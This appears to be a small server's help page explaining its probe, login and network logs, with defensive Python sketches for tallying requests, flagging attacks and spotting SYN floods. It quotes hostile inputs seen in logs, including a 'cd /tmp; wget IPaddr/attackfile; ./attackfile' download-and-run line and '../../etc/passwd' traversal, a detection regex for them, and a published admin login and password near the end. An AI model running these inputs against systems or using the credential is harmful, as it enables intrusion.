polycosmic-zervertest.zapto.org
Web Accesses and Login Attempts Received from the World
Log Analysis
request_uri -- /web/v1/probes.html
Any internet-connected system with any ports exposed to the wild and woolly internet
should expect probes and scans from many addresses around the planet.
If this is such a system,
there may be entertaining stuff in the Log Files.
Notes on results that can be selected above --
Weblog Status Codes --
- 200 -- OK, URL was recognized and a web page was returned.
- 206 -- Partial Content was requested as a byte-range, and returned.
- 301, 302 -- Redirect. In the detail logs,
this is typically followed immediately by the GET or POST to the redirected location.
- 304 -- Not Modified, file exists unmodified since a date given in the request,
and so does not need to be transmitted.
- 400 -- Bad Request, malformed or in an unrecognized format.
For the URL "/", the root of the documents tree,
this can occur for malformation of some additional data
that is not shown in these log entries.
- 401 -- Authorization needed. In the detail logs,
this can be followed by a repeat of the request, but with a userid and passphrase supplied.
- 404 -- Not Found, no such /directory/, file, or web page.
- There are many other status values.
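For tallying status codes from a raw access log,
here is a minimal sketch in Python.
It assumes the common Apache/nginx "combined" log format,
where the status code follows the quoted request;
the actual NetZerver log layout may differ.

    import re
    import sys
    from collections import Counter

    # In combined format the 3-digit status follows the quoted request line.
    STATUS = re.compile(r'" (\d{3}) ')

    def tally(path):
        counts = Counter()
        with open(path, errors="replace") as f:
            for line in f:
                m = STATUS.search(line)
                if m:
                    counts[m.group(1)] += 1
        return counts

    # usage: python3 tally.py access.log
    for code, n in sorted(tally(sys.argv[1]).items()):
        print(f"{code}: {n}")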
Random observations for Weblog URLs --
- .env files -- if found, expected to contain "environment variables"
that might be useful to a program,
such as PATH, which describes where on a system to look for programs for command names.
Such files frequently also hold security-sensitive values,
such as passwords or API keys to be automatically supplied when there is a login to another system,
which is why scanners hunt for them.
- .aws files -- For Amazon Web Services; the ~/.aws/ directory normally holds
AWS credentials and configuration, valuable if accidentally left in the web tree.
- .git and .svn files -- git and subversion are source-code control systems
used with software development and could be used for web-site development.
Apparently looking for details of the inner workings of the web-site.
- .php files -- PHP is a programming language frequently used in web-site development,
and a frequent target of probes for known-vulnerable scripts.
- wp- files -- WordPress is a widely-used blogging and content-management program
that apparently has a lot of possible security vulnerabilities,
so paths like wp-login.php and wp-admin/ are heavily probed.
- GET /web/dnld/... -- This directory has a number of large files
first created when this represented a product from a functioning company,
including software-update files with a ".tar" suffix,
bootable CD image files (also containing software-update files) with an ".iso" suffix,
and bootable disk images (compressed) suitable for VirtualBox
with ".vdi.gz" and ".vhd.zip" suffixes.
There are not a lot of NetZerver products in use on the planet,
and it is not clear why there should be so many downloads of these files.
There have been reports of a group
looking for and downloading ".iso" files
hoping to find copyright-protected commercial releases,
with a business plan of threatening the hosting site over copyright violations.
There may be downloads from agencies looking for trade-secret information
inadvertently left publicly accessible.
These files may be raw material for download speed tests.
None of this seems to explain why there would be so many downloads
to so many places.
- GET /web/dnld/...(more) --
A somewhat typical web log covered about 36 hours;
of the 100 files in the /web/dnld/ directory,
there were 159 downloads of 90 different files,
each file fetched from 1 to 3 times,
from 91 different IP addresses,
with 29 downloads from one IP address, 3 from another,
and the remainder fetching 1 or 2 files each.
Of the files not downloaded during this interval,
5 were among the most recent.
The 29 downloads from one IP address appear to be one bot;
the other 90 IP addresses appear to be part of a separate co-ordinated effort.
Not obvious why.
- GET and POST /web/v1/contact.html --
Sending spam to "Contact Us" web pages is a distinct business model
from all of the other probes.
- GET /.well-known/... -- This directory, not usually listed as an available share,
can have multiple security-related purposes.
/.well-known/acme-challenge/ can briefly exist during an
ACME Web-Certificate verify operation,
holding files with unlikely names and unlikely contents
to demonstrate to a Certificate Authority (such as LetsEncrypt.org)
that the system accessible with a given DNS-name
is indeed the one requesting a Certificate.
/.well-known/security.txt might exist
with information of use to a security researcher,
and to those looking for one more email address to spam.
- GET /?(junk) with 302 status, GET /web/v1/?(junk) with 200 status --
These count as successful operations despite the (junk).
The "/" is a legal path for the 302-redirect
and "/web/v1/" is a legal path that selects code that will
look for an "index.html" file to display,
and otherwise will provide a list of the files within that directory.
The parameters that begin with the "?" character
could change the sort-order of that display
but are otherwise ignored.
Thus the (junk) should be harmless.
- \x16\x03... operations -- non-printable bytes, hexadecimal 16 and 03, where the
operation GET, POST, or HEAD is expected.
These are the opening bytes of a TLS handshake record (type 0x16, version 3.x)
sent to a plaintext port,
apparently looking for an entertaining mis-handling.
- { lines -- a request beginning with "{" looks like raw JSON,
apparently looking for a web-server that will treat this line
as some kind of RPC-Remote-Procedure-Call.
- ../ and .%2e/ and .%2e%2f -- In path names in the URL part and in URL parameters after the '?',
these can mean to go one directory closer to the file-system root,
in an attempt to access a file that is outside of the web-documents part of the file-system,
frequently ../../etc/passwd
(the sketch after this list flags these, after percent-decoding).
- wget -- This program can fetch files over the internet,
and can be found as part of the parameters for a URL that is intended
to execute as a command.
Frequently part of "cd /tmp; wget IPaddr/attackfile; ./attackfile",
trying to download and then run a file on the target system
(also flagged by the sketch after this list).
- wget ... %s , wget ... 0.0.0.0, wget ... 192.168.x.x --
As part of GET /cgi-bin/luci and other commands,
these addresses are evidence of poor software development by an attacker.
The "%s" makes sense in a context where it is to be replaced by an actual internet address,
but here the actual address is not present.
The IPaddress of "0.0.0.0" will not reach a real system.
IPaddresses of the form "192.168.x.x" and "10.x.x.x"
can work in a local, isolated network environment
(separated from full internet by a firewall router)
but cannot reach the intended system when run outside of that isolated space.
- favicon -- If found, can be used for a tiny graphic on a web-browser tab,
or with a line in a BookMark list.
There can be multiple favicon files for different environments, e.g. apple-touch-icon.png.
- GET /../img/favicon with 400 status -- HTML text for "../img/favicon-16x16.png"
(and several other favicon files)
does occur within this website within the /web/v1/ directory,
meaning that the web client should adjust the path one step closer to the root,
and then go to the /img/ directory.
This allows text and images to be in different directories
without requiring a full, exact (and inflexible) path name
for the image directory.
Web browsers do this. Google (and perhaps other search engines) do this.
Unsophisticated scan bots do not.
- robots.txt -- Intended as direction to a search-engine scan
for parts of the web-site to be indexed, and parts to be left alone.
- IPaddrs mask to /24 or /64 -- A request from an individual using a web-browser
can be a small swarm of requests for the web-page,
any associated graphic files and favicon files,
all coming from a single IPv4 or IPv6 InternetProtocol address,
within a few seconds.
Deliberate scans, both search-engines and attack-bots,
frequently use multiple IP addresses that are closely associated.
Listing 32-bit IPv4 addresses as /24 regions,
and 128-bit IPv6 addresses as /64 regions,
is an attempt at identifying closely-associated accesses
(a grouping sketch follows this list).
This is not ideal.
For example, "googlebot" addresses are in a group with a whois listing
of 66.249.64.0 up to 66.249.95.255, a much larger /19 range.
- host or whois lookup -- on Linux/Unix systems, the commands "host IPaddr" and "whois IPaddr"
can sometimes reveal a DNS-name or some organization info about the address
(the grouping sketch below does the "host"-style lookup).
This is frequently pointless, showing a rent-a-system at Amazon, Google, or Microsoft,
paid for by the attacker,
or one that may have been compromised through discovery of a vulnerability
and is running a scan quietly in the background,
unknown to those who are paying the rent.
The Web access values are discarded with each reboot,
and discarded above a limit size.
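As mentioned in the "../" and "wget" items above,
many hostile requests carry recognizable markers.
Here is a minimal scanning sketch in Python;
the patterns are illustrative, not exhaustive,
and the log is assumed to hold one logged request per line.

    import re
    import sys
    from urllib.parse import unquote

    # Markers described in the list above; illustrative, not exhaustive.
    TRAVERSAL = re.compile(r'\.\./')               # matched after percent-decoding
    INJECTION = re.compile(r'\bwget\b|cd\s+/tmp', re.IGNORECASE)

    def flag(line):
        # Decode twice so ".%2e/" and double-encoded ".%252e/" both become "../".
        decoded = unquote(unquote(line))
        if TRAVERSAL.search(decoded):
            return "traversal"
        if INJECTION.search(decoded):
            return "injection"
        return None

    for line in open(sys.argv[1], errors="replace"):
        kind = flag(line)
        if kind:
            print(kind, line.rstrip())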
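And a sketch of the /24 and /64 grouping described above,
with a "host"-style reverse lookup as an ownership hint for the busiest groups.
It assumes one IP address per line on standard input,
e.g. cut from a copy of the access log.

    import ipaddress
    import socket
    import sys
    from collections import Counter

    def block_of(text):
        """The /24 (IPv4) or /64 (IPv6) region containing an address."""
        addr = ipaddress.ip_address(text)
        prefix = 24 if addr.version == 4 else 64
        return ipaddress.ip_network(f"{addr}/{prefix}", strict=False)

    def reverse_name(text):
        """Reverse-DNS lookup, roughly what the "host" command reports."""
        try:
            return socket.gethostbyaddr(text)[0]
        except OSError:
            return "(no name)"

    counts = Counter(str(block_of(line.strip()))
                     for line in sys.stdin if line.strip())
    for net, n in counts.most_common(20):
        # Look up a name for the first address in the region, as an ownership hint.
        first = str(ipaddress.ip_network(net).network_address)
        print(f"{n:6d}  {net:30s}  {reverse_name(first)}")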
Random observations for LoginLog --
- AttackBot behavior, upon stumbling onto an open port,
can vary from one Login attempt every 25 minutes
(intended to be unnoticeable on casual examination of the Logfile)
from a single IPaddress,
to multiple attempts every minute using a swarm of widely-separated IPaddresses,
each address used no more than 30 times,
over the course of months.
- Frequent userids for recent low-frequency attacks -- root, admin, ubuntu.
- Userids for a high-volume attack seem to be taken from some list,
rather than just generating e.g. all 3-letter combinations
(a tallying sketch follows these notes).
- This software does not capture the attempted passwords,
except when the userid-password list apparently got a bit out-of-sync
and showed "userids" of "123456" and "p@ssword".
- You might see a successful ssh_check rsync_ssh login by cbertsch,
as part of the updates to this web-site.
The Login Log is maintained across system reboots,
but results are discarded above a (likely different) limit size.
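For tallying the attempted userids and source addresses,
here is a minimal sketch in Python,
assuming OpenSSH-style "Failed password" lines in a system log;
the NetZerver LoginLog format is likely different.

    import re
    import sys
    from collections import Counter

    # OpenSSH-style: "Failed password for [invalid user] NAME from ADDR port N ssh2"
    FAILED = re.compile(r'Failed password for (?:invalid user )?(\S+) from (\S+)')

    users, sources = Counter(), Counter()
    for line in open(sys.argv[1], errors="replace"):
        m = FAILED.search(line)
        if m:
            users[m.group(1)] += 1
            sources[m.group(2)] += 1

    print("top userids:", users.most_common(10))
    print("top source addresses:", sources.most_common(10))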
Random observations for Network entries --
- The Network entries show the current state
(rather than a log)
of open ports, established connections,
and connections being formed.
- Connections can have very different durations --
NFS and Samba mounts could last hours or days.
FTP and SmartMirror-rsync connections could persist for minutes.
Web operations are typically started and finished within seconds.
- Current Network state is displayed here
due to a type of internet mis-behavior known as a SYN-flood.
It appears as dozens or hundreds of connections
in SYN-RECV state.
Normal behavior moves to ESTAB state within seconds.
The apparent source of these connect-attempts is typically a compact set of
IP-Internet-Protocol addresses, such as 256 (IPv4/24) or 1024 (IPv4/22),
spread throughout that range.
What may be going on --
the apparent source of these requests,
being used by a single company or ISP-Internet-Service-Provider,
is actually the target of an overload attempt,
and this system is (unwittingly) aiding the overload.
The attacker composes the connect request as if it came from one of the target addresses,
and tosses it into the internet to be delivered to the NetZerver system.
Thus (1) the target system gets a (possibly very large) number of responses, unsolicited,
from this system with no fingerprints of the actual attacker,
and (2) this system will repeat that response to the target system
perhaps 5-6 times over a couple of minutes,
thus amplifying the load.
With enough such (unwittingly) cooperating systems,
a large load, perhaps damaging, can be generated.
The "Network tcp connections, all states" display
will show if the NetZerver system
has dozens or hundreds of such SYN-RECV state connections
(a counting sketch follows this list).
Remote addresses are shown in IPv6 format,
with IPv4 addresses as IP4-in-6 --
"::ffff:", followed by the IPv4 address in the usual dotted-decimal notation.
These lines are sorted by text-compare (rather than numerically)
so that e.g. after 192.168.33.0 comes .1, .10, .100, .101, .11, and then .2.
- Among the many performance-monitor counts within Linux,
it appears that TCPSynRetrans shows the number
of such generated responses (also read by the sketch after this list).
Under normal operation,
there might be a handful over a week.
Several displays will show SynRetrans/sec (or per min or per hour)
counted from system start-up
or from the previous run of this program
(recent few seconds or minutes).
- Any system that is behind a firewall
(that prevents access from the general internet)
should not have to worry about this.
If there is port-forwarding from the general internet
to an internal system,
consider if that port really needs to be open,
if it can be opened only when needed,
or if an alternate port number can be used.
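A minimal sketch of both checks mentioned above,
for Linux, reading the /proc files directly:
sockets sitting in SYN-RECV state,
and the TcpExt TCPSynRetrans counter.

    def syn_recv_count():
        """Count sockets in SYN-RECV state (state field "03" in /proc/net/tcp*)."""
        total = 0
        for path in ("/proc/net/tcp", "/proc/net/tcp6"):
            try:
                with open(path) as f:
                    next(f)                      # skip the header line
                    total += sum(1 for line in f if line.split()[3] == "03")
            except FileNotFoundError:
                pass                             # no IPv6 on this system
        return total

    def tcp_syn_retrans():
        """Read the TcpExt TCPSynRetrans counter from /proc/net/netstat."""
        with open("/proc/net/netstat") as f:
            lines = f.readlines()
        # The file holds pairs of lines: a header of names, then the values.
        for names, values in zip(lines[::2], lines[1::2]):
            if names.startswith("TcpExt:"):
                fields = dict(zip(names.split()[1:], values.split()[1:]))
                return int(fields.get("TCPSynRetrans", 0))
        return 0

    print("SYN-RECV sockets:", syn_recv_count())
    print("TCPSynRetrans since boot:", tcp_syn_retrans())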
If this is expected to be a low-traffic system,
then almost all of the traffic shown in these displays is the result of
various bots doing automated scans of parts of the internet address space.
Some of these scans are benign -- e.g. Google builds its indexes
by regularly scanning every system that has a name.
Some are benign-ish -- companies probing for security problems,
not to steal data or cause damage,
but to sell or provide security monitoring.
Most are looking for exploit opportunities,
to steal data,
to encrypt data for ransom,
or to load and run the attacker's code,
perhaps a keylogger hoping to capture bank-account info or passwords,
or to use the target's CPU and network bandwidth
for spam-generation, crypto-mining, or further scans of other systems.
Note that for at least one of the systems carrying this text,
at polycosmic.net,
the detailed log files can be examined
using a "read-only" admin userid "rodmin",
with credential "Heisenberg42".
Contact us at polycosmic.info /at/ gmail
or at cbertsch /at/ cox.net
All text on this website,
nonsense and otherwise,
is 100% organically generated,
with one exception:
on the Contact-Us webpage,
some answers to the "I-am-not-a-robot" field
appear to be generated by robots.